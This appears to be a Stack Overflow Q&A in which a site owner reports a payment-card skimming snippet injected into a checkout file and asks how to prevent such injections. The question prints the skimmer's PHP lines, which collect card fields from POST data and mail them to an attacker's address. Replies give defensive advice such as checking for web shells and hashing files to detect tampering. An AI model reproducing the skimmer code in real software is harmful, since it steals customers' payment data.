# Avoiding PHP injection to Post data from a form

Tags: php, post, payment, code-injection

I was just re-testing the flow in a website we have created and when I got to the Checkout section, I realized there was some code in the page that we had never written. It was an injection and it really scared us.
The code was just put as text in one of the checkout files so it wouldn't execute since it was was not within PHP tags, but it was pretty scary.

The code was essentially Posting each of the fields for payment instructions (name on card, card type, card number, cvc, expiration date) and then executing a mail() php function to send the information to a specific email. I even have the email of the hacker!!

```
$message .= "Number : ".$_POST['card_number']."\n";
$message .= "Cvv : ".$_POST['card_brand']."\n";
$message .= "exp : ".$_POST['card_expiration']."\n";
$message .= "Name : ".$_POST['card_holder']."\n";
$i = "______@yahoo.fr";
$subject = "cc";
mail($i,$subject,$message);
```

How could we avoid PHP injections in our site? I contacted Stripe, who supports our payments to check if their API is safe enough. I think it is. However, mailing information and other information non-payment related could be easily hacked with an injection like this. How could we avoid injections in our files?

Thanks!!

Comment: there are thousands of ways you could be hacked, it maybe the server/ftp/ssh account, or the script itself being vulnerable to RFI, an upload form not checking the files correctly, etc etc. You will have to review your code and take actions for it.

Comment: If an attacker was able to modify one of your scripts, albeit outside of PHP tags, you have a serious vulnerability in your system. You should drop all development work and  make it your immediate priority to find and fix the hole, especially given you appear to be taking credit card details directly. Start by analyzing log files and checking that all software is up to date (web server, FTP daemon etc etc).

Comment: Unfortunately I don't own the server. It is a provider. What could I do myself? I have already passed them the complain.

Answer (score 1, accepted):

That would take a rather smart bot to detect that and inject it in the right place.. Someone has access to the FTP or has uploaded a PHP file manager -- which could have came from a file upload script.

Once you get everything cleaned up, perhaps you could take a "hash snapshot" of the files.. then scan through them (either automated or manually) to test for hash changes. If there's anything changed in the file, the hash of the file will change as well - then you could have it alert someone. From there, you can go through the logs and try to figure out where it came from.

Just an idea.

Comment: How could I detect if they have uploaded something to the server?

Comment: Find files which you didn't upload, or use some kind of c99/etc shell detection. Does your server have any file upload scripts on?

Comment: or do a search in your website files after `eval(`, and you will more than sure, find a c99 shell or the like.

Comment: Something like this may help: http://25yearsofprogramming.com/php/findmaliciouscode.htm - I've had to use modified parts of this in old sites.

Comment: Basically, once you audit the ENTIRE site and its files, take a snapshot of the hash of the files. Later, you can then SCAN the files against the list of "known good hashes". If any hash comes up that doesn't match the snapshot of the good file, or if a hash comes up that wasn't originally stored, then you know it's been modified. Do not ever rely on last modified timestamp.